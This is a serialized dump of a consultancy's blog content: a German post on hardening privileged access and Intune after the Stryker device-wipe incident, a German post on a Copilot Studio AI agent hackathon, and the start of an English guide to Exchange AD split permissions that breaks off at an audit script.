Arbeitskontext getrennt. Dieser Least-Privilege-Ansatz bedeutet, dass ein kompromittiertes Produktivitätskonto die Management-Ebene nicht erreichen kann und ein kompromittiertes Management-Konto keine Control-Plane-Operationen durchführen kann. Das gilt gleichermaßen für reine Cloud-Umgebungen und hybride Setups einschließlich On-Premises-Anbindung an Active Directory über Entra ID, wo ein einziges überprivilegiertes Konto nach wie vor die Cloud und die Domäne verbinden kann.",[806,4018,4019],{},"Die Idee ist einfach. Administrative Arbeit findet auf administrativen Geräten statt. Die Identität, die zur Verwaltung des Microsoft 365-Tenants, der Intune-Umgebung oder der Azure-Infrastruktur verwendet wird, ist niemals dieselbe Identität, die zum Lesen von E-Mails oder zur Teilnahme an Teams-Anrufen genutzt wird. Das Gerät, das für diese administrativen Sitzungen verwendet wird, ist gehärtet, eingeschränkt und vom regulären Internet-Browsing und dem Produktivitätskontext isoliert, der die Angriffsfläche erzeugt. 
Laterale Bewegung wird strukturell schwieriger, weil es keinen lateralen Pfad gibt.",[810,4021,4023],{"id":4022},"zwei-verteidigungsebenen","Zwei Verteidigungsebenen",[806,4025,816],{},[806,4027,4028],{},"Um dieses Bedrohungsmodell richtig zu adressieren, muss man gleichzeitig auf zwei Ebenen arbeiten: sichern, wer die Management-Ebene und deren Anmeldedaten berühren kann, und härten, wie diese Management-Ebene selbst konfiguriert und betrieben wird. Das sind nicht dasselbe Problem, und beide sind wichtig.",[806,4030,4031],{},[1449,4032],{"alt":4033,"src":4034},"Risiko- und Produktzuordnung für das Stryker-Angriffsszenario: Managed Red Tenant adressiert Identitäts- und Zugriffsrisiken, Managed Intune adressiert Endpoint-Management-Risiken","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[1671,4036,4038],{"id":4037},"managed-red-tenant-den-administrativen-kontext-schützen","Managed Red Tenant: den administrativen Kontext schützen",[806,4040,1536],{},[806,4042,4043,4044,4046],{},"Die erste Ebene ist die vollständige Isolierung des privilegierten Zugangs. Dafür ist unser ",[833,4045,394],{"href":395}," konzipiert.",[806,4048,4049],{},"Der Managed Red Tenant bietet eine vollständig isolierte, cloudbasierte administrative Umgebung – einen dedizierten Microsoft Entra-Tenant („der Red Tenant\"), der ausschließlich für privilegierte Operationen genutzt wird. Administrative Identitäten leben hier. Administrative Geräte werden hier verwaltet. Nichts aus der regulären Arbeitsumgebung fließt hinüber.",[806,4051,4052],{},"Für die kritischsten Rollen – jene mit Control-Plane-Zugang, wie Global Administratoren – implementieren wir den „Clean Keyboard\"-Ansatz: eine physische Privileged Admin Workstation (PAW) mit dedizierter Hardware, gehärteten Richtlinien und keinerlei Berührungspunkten mit dem alltäglichen Arbeitskontext. 
Für administrative Rollen unterhalb der Control Plane bieten wir skalierbare Virtual Access Workstations (VAW) an, die auf einer gehärteten Azure Virtual Desktop-Infrastruktur innerhalb des Red Tenants aufgebaut sind. Der Zugriffspfad selbst ist durch Microsoft Entra Private Access geschützt, mit Zero Trust Network Access und Conditional Access-Richtlinien, bevor eine Sitzung hergestellt werden kann.",[806,4054,4055],{},"Microsoft Entra Internet Access blockiert den öffentlichen Internetzugang aus administrativen Sitzungen und beschränkt die Verbindungen strikt auf privilegierte Schnittstellen und autorisierte Tenant-Umgebungen. Ein nahezu in Echtzeit erfolgender Sitzungswiderruf ist durch Universal Continuous Access Evaluation möglich, was bedeutet, dass ein widerrufenes Credential nicht als gültige Sitzung weiterbesteht.",[806,4057,4058,4059,4062],{},"Der Managed Red Tenant wird rund um die Uhr von unserem ",[833,4060,4061],{"href":423},"Cloud Security Operations Center (CSOC)"," überwacht, mit speziell entwickelten Erkennungen, die gezielt auf administrative Berechtigungen und Zugriffsmuster ausgerichtet sind. Ein Angreifer, der irgendwie ein Credential in dieser Umgebung kompromittiert, hätte nicht drei unentdeckte Stunden, um Wipe-Befehle über eine globale Geräteflotte auszuführen.",[806,4064,4065],{},"Das ist besonders relevant für Rollen wie Intune-Administratoren. Sie wissen, wie man Clients sichert, aber die Absicherung einer privilegierten Admin-Workstation erfordert andere Fähigkeiten: Enterprise Access Architecture, Identity Hardening, Zero Trust Controls. Diese liegen typischerweise beim Sicherheitsteam. Ein Managed Red Tenant nimmt diese Last vollständig ab: Intune-Admins erhalten eine professionell verwaltete, konsistent gehärtete Workstation, ohne selbst zu Experten für Sicherheits-Workstations werden zu müssen. 
Das gilt für jede hochprivilegierte Rolle in der Organisation.",[4067,4068],"video-frame",{"thumb":4069,"alt":4070,"id":4071,":full-width":1435},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer und Thomas Naunheim diskutieren die Managed Red Tenant-Cybersicherheitsstrategie","rOEIvItNkjE",[1541,4073,4075,4076],{"style":4074},"background:var(--color-gk-light-grey); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-gk-dark-blue)","Mehr auf unserem ",[833,4077,4080],{"href":4078,"target":513,"rel":4079},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[3867],"YouTube-Kanal",[1671,4082,4084],{"id":4083},"managed-intune-die-management-ebene-selbst-absichern","Managed Intune: die Management-Ebene selbst absichern",[806,4086,1536],{},[806,4088,4089,4090,4092],{},"Die zweite Ebene ist sicherzustellen, dass Intune – das Tool, das beim Stryker-Angriff als Waffe eingesetzt wurde – nach höchstem Sicherheitsstandard konfiguriert, betrieben und kontinuierlich gepflegt wird. Dafür ist unser ",[833,4091,45],{"href":46},"-Service zuständig.",[806,4094,4095],{},"Eine der zentralen Erkenntnisse aus Vorfällen wie diesem ist, dass Organisationen häufig Intune-Umgebungen erben, die organisch gewachsen sind: Richtlinien auf Richtlinien gestapelt, manuelle Änderungen über das Portal, die schwer zu prüfen sind, und Sicherheits-Baselines, die mit Microsofts eigenen, sich weiterentwickelnden Empfehlungen nicht Schritt gehalten haben. 
Genau diese Art von Umgebung ist es, in der Konfigurationsdrift ausnutzbare Lücken schafft.",[806,4097,4098,4099,4104],{},"Microsoft hat kürzlich ",[833,4100,4103],{"href":4101,"rel":4102},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[1410],"Best Practices für die Absicherung von Microsoft Intune"," veröffentlicht – ein Signal, dass auch Microsoft Intune-Härtung als Thema betrachtet, das branchenweit explizite Aufmerksamkeit erfordert. Unser Managed Intune-Service basiert auf diesen Prinzipien, und wir haben Microsofts Empfehlungen als Teil unserer Baseline implementiert.",[806,4106,4107],{},"Unser Managed Intune-Service basiert auf der glueckkanja Intune Foundation: ein bewährter, kontinuierlich gepflegter Satz von Best Practices für das Gerätemanagement, vollständig als Code mit Terraform und unserem eigenen TerraProvider bereitgestellt. Jede Änderung ist automatisiert, versionskontrolliert und prüfbar. Es gibt keine undokumentierten Click-through-Konfigurationen, die ein Angreifer ausnutzen könnte, indem er die Lücke zwischen dem Beabsichtigten und dem tatsächlich Gesetzten versteht.",[806,4109,4110],{},"Aus Sicherheitsperspektive bedeutet das, dass Zero Trust, App Protection Policies und Endpoint Security-Konfigurationen by Design konsistent angewendet werden – über Windows, macOS, iOS und Android – nicht als einmalige Bereitstellungen, sondern als kontinuierlich durchgesetzte, fortlaufend aktualisierte Baselines, die Microsofts eigene Sicherheitsleitlinien nachverfolgen.",[806,4112,4113],{},"Entscheidend ist, dass Managed Intune die betriebliche Reife widerspiegelt, die modernes Endpoint-Management erfordert: kontinuierliches Compliance-Monitoring, strukturierte Änderungsgovernance und regelmäßige Service-Reviews – nicht als optionale Extras, sondern als Baseline-Operationen. Aber die Intune-Konfiguration zu sichern ist nur die halbe Miete. 
Wenn der Administrator, der auf die Konsole zugreift, dies von einem ungeschützten Gerät aus tut, bleibt die Management-Ebene trotzdem exponiert – genau hier vervollständigt der Managed Red Tenant das Modell.",[806,4115,4116],{},"Da alle Konfigurationen als Code auf Basis der Intune Foundation bereitgestellt werden, setzen wir ein striktes Vier-Augen-Prinzip mit Peer Review, zusätzlicher automatisierter Validierung und kontrollierten Deployment-Pipelines durch. Das eliminiert nicht verwaltete Portal-Änderungen innerhalb der Intune Foundation und stellt eine konsistente, prüfbare und sichere Baseline über alle Geräte hinweg sicher.",[806,4118,4119],{},"Der administrative Zugang wird durch ein Least-Privilege-Modell mit GDAP und Azure Lighthouse gesteuert, mit klar definierten Verantwortlichkeiten und eng begrenztem Zugang zum Kunden-Tenant. Das reduziert die mit privilegierten Operationen verbundene Angriffsfläche erheblich.",[806,4121,4122],{},"Aktionen auf Geräteebene, einschließlich destruktiver Operationen, verbleiben in der Verantwortung des Kunden, da ihre Ausführung eng mit organisationsspezifischen Prozessen und internen Governance-Frameworks verbunden ist. Microsoft und CISA empfehlen, solche Aktionen durch zusätzliche Schutzmaßnahmen zu sichern, beispielsweise durch Multi-Admin-Genehmigungskontrollen in Intune.",[810,4124,4126],{"id":4125},"die-unbequeme-frage","Die unbequeme Frage",[806,4128,816],{},[806,4130,4131],{},"Der Stryker-Angriff ist keine Anklage gegen Microsoft Intune. Intune hat sich genau so verhalten, wie es konzipiert wurde. Es führte die Befehle aus, die es von einem authentifizierten Administrator erhielt. Das Versagen lag nicht im Tool. Es lag im Fehlen von Kontrollen darüber, wer dieses Tool erreichen konnte, aus welchem Kontext heraus und mit welchem Autorisierungsgrad.",[806,4133,4134],{},"Das ist ein Governance- und Architekturproblem. 
Und es ist dasselbe Problem, das in den meisten Organisationen besteht, die heute Microsoft 365 betreiben.",[806,4136,4137],{},"Wenn Ihre Administratoren auf Intune, Entra ID oder Azure von denselben Geräten und Identitäten zugreifen, die sie für die alltägliche Arbeit verwenden – und wenn Ihre Intune-Umgebung über Jahre manueller Portal-Änderungen gewachsen ist anstatt durch ein strukturiertes, automatisiertes Betriebsmodell – tragen Sie dasselbe strukturelle Risiko, das Stryker am 11. März trug. Die Frage ist, ob ein Angreifer diese Schwachstelle finden wird, bevor Sie sie schließen.",[806,4139,4140,4142,4143,4145],{},[833,4141,394],{"href":395}," adressiert die Privilege- und Identitätsebene. ",[833,4144,45],{"href":46}," adressiert die Konfigurations- und Betriebsebene. Zusammen schließen sie die zwei Lücken, die den Stryker-Angriff möglich gemacht haben.",[806,4147,4148],{},"Wenn Sie verstehen möchten, wie einer der Services auf Ihre aktuelle Umgebung zutrifft oder wo Ihre konkreten Schwachstellen liegen, sprechen wir gerne darüber.",[806,4150,4151],{},"Wir werden in Kürze auch einen Deep-Dive-Artikel veröffentlichen, der untersucht, wie der Stryker-Vorfall überhaupt möglich sein konnte.",[810,4153,4155],{"id":4154},"weitere-informationen","Weitere Informationen",[806,4157,816],{},[2738,4159,4160,4167,4173,4180],{},[2741,4161,4162],{},[833,4163,4166],{"href":4164,"rel":4165},"https://www.cisa.gov/secure-cloud-business-applications",[1410],"CISA: Securing Cloud Business Applications",[2741,4168,4169],{},[833,4170,4172],{"href":4101,"rel":4171},[1410],"Microsoft: Best Practices für die Absicherung von Microsoft Intune",[2741,4174,4175],{},[833,4176,4179],{"href":4177,"rel":4178},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[1410],"TechCrunch: CISA fordert Unternehmen auf, Microsoft Intune-Systeme zu sichern, nachdem Hacker Stryker-Geräte massenhaft 
gelöscht haben",[2741,4181,4182],{},[833,4183,4186],{"href":4184,"rel":4185},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[1410],"Managed Red Tenant im Azure Marketplace",{"title":863,"searchDepth":864,"depth":864,"links":4188},[4189,4190,4191,4192,4193,4197,4198],{"id":3965,"depth":864,"text":3966},{"id":3977,"depth":864,"text":3978},{"id":3995,"depth":864,"text":3996},{"id":4007,"depth":864,"text":4008},{"id":4022,"depth":864,"text":4023,"children":4194},[4195,4196],{"id":4037,"depth":1814,"text":4038},{"id":4083,"depth":1814,"text":4084},{"id":4125,"depth":864,"text":4126},{"id":4154,"depth":864,"text":4155},{"lang":4,"seoTitle":4200,"titleClass":873,"date":4201,"categories":4202,"blogtitlepic":4203,"socialimg":4204,"customExcerpt":4205,"keywords":4206,"hreflang":4207,"asideNav":4214,"contactInContent":4229,"maxContent":749,"published":508},"Der Stryker-Angriff: Wie ein kompromittiertes Admin-Konto 80.000 Geräte über Intune löschte","2026-03-20",[371],"head-stryker.jpg","/blog/heads/head-stryker.jpg","Am 11. März 2026 löschte Handala Geräte in 79 Ländern, und alles, was dafür nötig war, war ein kompromittiertes Intune-Admin-Konto. Keine Malware, kein Exploit, nur legitime Management-Tools, gegen ihre Besitzer gerichtet. 
Was passiert ist, warum es funktioniert hat und welche zwei architektonischen Lücken geschlossen werden müssen.","Stryker-Angriff, Handala, Microsoft Intune Wipe, Privileged Access Management, Admin-Workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, Endpoint-Management-Sicherheit",[4208,4210,4212],{"lang":4,"href":4209},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":956,"href":4211},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":953,"href":4213},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":4215},[4216,4218,4220,4222,4225,4227],{"href":4217,"text":3966},"#was-wirklich-passiert-ist",{"href":4219,"text":3978},"#warum-dieser-angriff-erfolgreich-war",{"href":4221,"text":3996},"#cisa-hat-genug-gesehen",{"href":4223,"text":4224},"#trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus",{"href":4226,"text":4023},"#zwei-verteidigungsebenen",{"href":4228,"text":4126},"#die-unbequeme-frage",{"quote":508,"infos":4230},{"bgColor":883,"headline":3669,"subline":4231,"level":810,"textStyling":887,"flush":888,"person":4232,"form":4234},"Möchten Sie wissen, wie Managed Red Tenant und Managed Intune die Lücken schließen, die der Stryker-Angriff ausgenutzt hat? Füllen Sie das Formular aus und wir erläutern Ihnen, wie es auf Ihre Umgebung zutrifft.",{"image":3672,"cloudinary":508,"alt":3673,"name":1127,"quotee":1127,"quoteeTitle":3674,"quote":4233},"Das Tool hat genau das getan, was man ihm gesagt hat. Das Problem war, dass niemand hätte in der Lage sein sollen, ihm das zu sagen – nicht von einem kompromittierten Alltags-Konto aus, nicht ohne eine zweite Genehmigung, nicht ohne eine isolierte administrative Umgebung. 
Das ist die Lücke, bei deren Schließung wir Organisationen helfen.",{"ctaText":905,"cta":4235,"method":870,"action":908,"fields":4236},{"skin":907},[4237,4238,4240,4242,4244,4247,4249,4250,4251,4253,4254,4255],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":4239},"Bitte geben Sie Ihren Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":4241},"Bitte geben Sie Ihr Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":4243},"Bitte geben Sie Ihre E-Mail-Adresse ein.",{"label":4245,"type":928,"id":929,"required":749,"requiredMsg":4246},"Ihre Nachricht an uns","Bitte geben Sie eine Nachricht ein.",{"label":4248,"type":933,"id":934,"required":508,"requiredMsg":935},"Ihre Daten werden gespeichert und zur Beantwortung Ihrer Anfrage verwendet. Weitere Informationen finden Sie in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":4252},"Form: Blog Stryker Attack Intune Privilege | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":3953,"description":3959},"posts/2026-03-20-stryker-attack-intune-privilege",[103,4260,4261],"Privileged Access","Zero Trust","zy02he8Pegg9x8cCjPWcEYmTfzkYQVnYgWhO_Clfueo",{"id":4264,"title":4265,"author":4266,"body":4267,"cta":764,"description":4271,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4303,"moment":4305,"navigation":508,"path":4318,"seo":4319,"stem":4320,"tags":4321,"webcast":749,"__hash__":4325},"content_de/posts/2026-03-16-ai-agent-hackathon.md","Sechs Agents. Vier Wochen. 
Echter Betrieb.",[801],{"type":803,"value":4268,"toc":4301},[4269,4272,4275,4278,4281,4284,4289,4292,4295,4298],[806,4270,4271],{},"Wie viele Stunden verbringt eure IT-Abteilung pro Woche mit Aufgaben, die ein Agent in Minuten erledigen könnte?",[806,4273,4274],{},"Es gibt in der deutschen Unternehmenslandschaft einen Prozess, den fast jede IT-Abteilung kennt: Jemand liest Verträge. Jemand anderes sortiert Anforderungen in Kategorien. Wieder jemand beantwortet dieselben Fragen zu Lieferungen, die gestern schon jemand beantwortet hat. Es sind keine glamourösen Probleme. Aber es sind die, die in Summe Zehntausende Stunden im Jahr kosten und die sich erstaunlich gut für AI Agents eignen, wenn man weiß, wo man den Hebel ansetzt.",[806,4276,4277],{},"Sechs Unternehmen haben im Februar bei uns in Offenbach genau das getan. Kiekert lässt Anforderungen im R&D jetzt regelbasiert kategorisieren, mit Confidence Score und Feedback-Loop. Der Agent läuft bereits produktiv. Dr. Oetker hat einen Contract Review Assistant gebaut, der IT-Verträge auf kritische Klauseln prüft und einen strukturierten Prüfbericht für Einkauf und Legal erstellt. Eckes-Granini ist gleich mit zwei Agents angetreten: einem Onboarding-Agenten, der neue Mitarbeitende ab dem ersten Login durch MFA, Office-Setup und Sicherheitsrichtlinien führt, und einem Logistik-Agenten, der Disponenten Fragen zu Sendungen, Tarifen und Spediteuren beantwortet. igefa hat einen sprachbasierten Hotline-Agenten für den internen IT-Support entwickelt, angebunden an JIRA und Confluence. 
Und die lila logistik hat das vielleicht ungewöhnlichste Projekt mitgebracht: einen Use Case Generator, der in SharePoint und Exchange beobachtet, wo Automatisierungspotenziale liegen, weil das eigentliche Problem oft nicht die Technologie ist, sondern dass niemand im Unternehmen die richtigen Stellen erkennt.",[806,4279,4280],{},"All das entstand im Copilot Studio, mit Agent Flows, Dataverse Anbindungen und MCP Connectoren, begleitet von vier unserer MVPs. Vier Wochen Build-Phase, neben dem normalen Tagesgeschäft. Die Teilnehmenden mussten sich jede Stunde dafür freischaufeln, neben Tickets, Quartalsabschlüssen und dem operativen Betrieb. Dass am Ende sechs funktionsfähige Agents standen, sagt weniger über die Technologie als über die Teams, die sie gebaut haben.",[806,4282,4283],{},"Am 10. März, Microsoft Office Frankfurt, dann die Probe: Sechs Präsentationen, je 20 Minuten, bewertet nach Business Impact, technischer Tiefe und dem Applaus des Publikums (ja, auch der steht auf dem Bewertungsbogen). Kiekert hat gewonnen, weil ihr Agent produktiv läuft, gebaut von jemandem aus der Fachabteilung, ohne IT-Hintergrund, ohne Vorerfahrung im Copilot Studio. Dr. Oetker, weil die Vertragsprüfung so universell ist, dass die Jury danach über die eigenen IT-Verträge nachdachte. Dass alle sechs Teams in vier Wochen neben dem Tagesgeschäft einen lauffähigen Agent gebaut haben: Das war am Ende die eigentliche Nachricht des Tages.",[4067,4285],{"thumb":4286,"alt":4287,"id":4288,":full-width":1435},"/thumbs/thumb-ai-agent-hackathon.jpg","Präsentation des glueckkanja AI Agent Hackathons im Microsoft Office Frankfurt: Sechs Teams zeigen ihre Copilot Studio Agents vor Publikum.","GjumQAnKj8k",[1541,4290,4291],{"style":4074},"glueckkanja AI Agent Hackathon – Sechs Unternehmen, sechs Agents, vier Wochen",[806,4293,4294],{},"Das Format heißt glueckkanja AI Agent Hackathon. Entstanden aus einem Microsoft Hackathon in München, bei dem wir mit Knorr-Bremse teilgenommen haben. 
Microsoft hat uns danach gebeten, es mit unseren Kunden weiterzuführen. Die Idee ist einfach: Unternehmen bewerben sich mit einem konkreten Prozess, der heute manuell läuft. Wir schärfen den Use Case, definieren die Architektur und bauen gemeinsam. Wer nicht gleich in den Hackathon einsteigen will: Wir machen auch Workshops, in denen wir Use Cases identifizieren und die Agent Architektur vorbereiten: als Einstieg oder als eigenständiges Format.",[806,4296,4297],{},"Der nächste glueckkanja AI Agent Hackathon startet im Herbst 2026. Die Registrierung ist offen. Wer vorher schon Use Cases identifizieren und die eigene Umgebung vorbereiten will: Wir machen das gerne. Sprecht uns an.",[806,4299,4300],{},"Danke an Sylvia und Miriam von Microsoft für das Vertrauen ins Format. An Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik für den Mut und den Einsatz. Und an unser glueckkanja-Team, dass ihr das möglich gemacht habt.",{"title":863,"searchDepth":864,"depth":864,"links":4302},[],{"lang":4,"seoTitle":4304,"titleClass":873,"date":4305,"categories":4306,"blogtitlepic":4307,"socialimg":4308,"customExcerpt":4309,"keywords":4310,"hreflang":4311,"published":508},"glueckkanja AI Agent Hackathon: Sechs Unternehmen bauen AI Agents mit Copilot Studio","2026-03-16",[876],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Sechs Unternehmen, vier Wochen Build-Phase, sechs funktionierende AI Agents – das war der erste glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik haben im Copilot Studio Agents gebaut, die heute produktiv laufen. Was dabei entstand und wie das Format funktioniert.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. 
Oetker, Eckes-Granini, igefa, lila logistik, AI Automatisierung, Unternehmens-KI, Prozessautomatisierung",[4312,4314,4316],{"lang":4,"href":4313},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":953,"href":4315},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":956,"href":4317},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":4265,"description":4271},"posts/2026-03-16-ai-agent-hackathon",[965,4322,4323,4324],"Copilot Studio","Hackathon","AI Agents","AezE-PbU3R4HvvyLcY4iCjfmOojUoQr8V6qpK-hxp_Q",{"id":4327,"title":4328,"author":4329,"body":4330,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4989,"moment":4991,"navigation":508,"path":5016,"seo":5017,"stem":5018,"tags":764,"webcast":749,"__hash__":5019},"content_de/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[1041],{"type":803,"value":4331,"toc":4976},[4332,4336,4339,4345,4350,4366,4369,4374,4377,4381,4389,4403,4409,4412,4417,4453,4476,4480,4488,4496,4501,4517,4521,4527,4531,4536,4594,4599,4636,4639,4643,4658,4665,4681,4690,4694,4697,4743,4746,4755,4764,4767,4782,4799,4812,4824,4829,4888,4892,4897,4917,4924,4948,4952,4955,4958,4973],[810,4333,4335],{"id":4334},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[806,4337,4338],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. 
And we still retain the security benefits against lateral movement and domain compromise.",[806,4340,4341],{},[1449,4342],{"alt":4343,"src":4344},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[806,4346,4347],{},[1736,4348,4349],{},"It’s achieved in three steps:",[4351,4352,4353,4360,4363],"ol",{"style":3756},[2741,4354,4355,4356],{},"Implement ",[833,4357,4359],{"href":4358},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions","AD split permission model",[2741,4361,4362],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[2741,4364,4365],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[806,4367,4368],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[4067,4370],{"thumb":4371,"alt":4372,"id":4373,":full-width":1435},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[1541,4375,4376],{"style":4074},"Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[810,4378,4380],{"id":4379},"why-do-we-care-now","Why do we care (now)?",[806,4382,4383,4384,4386,4388],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. 
Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[2016,4385],{},[2016,4387],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[2738,4390,4391,4394,4397,4400],{"style":3756},[2741,4392,4393],{},"modify permissions on users and groups (effectively full access)",[2741,4395,4396],{},"modify group members",[2741,4398,4399],{},"reset password on users",[2741,4401,4402],{},"create/delete users and groups",[806,4404,4405],{},[1449,4406],{"alt":4407,"src":4408},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[806,4410,4411],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[806,4413,4414],{},[1736,4415,4416],{},"Prominent examples:",[2738,4418,4419,4422,4442],{"style":3756},[2741,4420,4421],{},"Entra Connect Sync account when using Password Hash Sync",[2741,4423,4424,4425],{},"Default groups",[2738,4426,4428,4431,4439],{"style":4427},"margin: 0",[2741,4429,4430],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[2741,4432,4433,4434,4438],{},"Also see ",[833,4435,4437],{"href":4436,"target":513},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta","Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[2741,4440,4441],{},"Emptying Protected Users to create attack vectors by removing protections",[2741,4443,4444,4445],{},"Unprotected custom groups or admin/service 
accounts",[2738,4446,4447,4450],{"style":4427},[2741,4448,4449],{},"Write permission on GPOs (applying to domain controller)",[2741,4451,4452],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[806,4454,4455,4456,4458,4460,4461,4466,4468,4470,4471],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2016,4457],{},[2016,4459],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[833,4462,4465],{"href":4463,"rel":4464},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[1410],"Configure Exchange Server for split permissions | Microsoft Learn",[2016,4467],{},[2016,4469],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[833,4472,4475],{"href":4473,"rel":4474},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[1410],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[810,4477,4479],{"id":4478},"but-why-is-no-one-doing-it","But why is no one doing it?",[806,4481,4482,4483,4485,4487],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[2016,4484],{},[2016,4486],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[3587,4489,4490],{},[806,4491,4492,4495],{},[1736,4493,4494],{},"Info:"," The following 
cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[806,4497,4498],{},[1736,4499,4500],{},"Adoption examples:",[2738,4502,4503,4514],{"style":3756},[2741,4504,4505,4506],{},"New-Mailbox (where Exchange writes to AD) would be:",[2738,4507,4508,4511],{"style":4427},[2741,4509,4510],{},"New-ADUser (where adm.jdoe writes to AD)",[2741,4512,4513],{},"Enable-Mailbox",[2741,4515,4516],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[810,4518,4520],{"id":4519},"show-me-this-no-regrets-option","Show me this no-regrets option!",[806,4522,4523,4526],{},[1736,4524,4525],{},"Disclaimer",": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[1671,4528,4530],{"id":4529},"audit-current-usage","Audit current usage",[806,4532,4533],{},[1736,4534,4535],{},"You should first check which of the affected cmdlets are in use on which OUs:",[2009,4537,4538,4545,4547,4553,4555],{},[1588,4539,4540,4544],{},[1588,4541,4543],{"style":4542},"color:var(--color-gk-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[2016,4546],{},[1588,4548,4549,4552],{},[1588,4550,4551],{"style":4542},"$Cmdlets"," = 
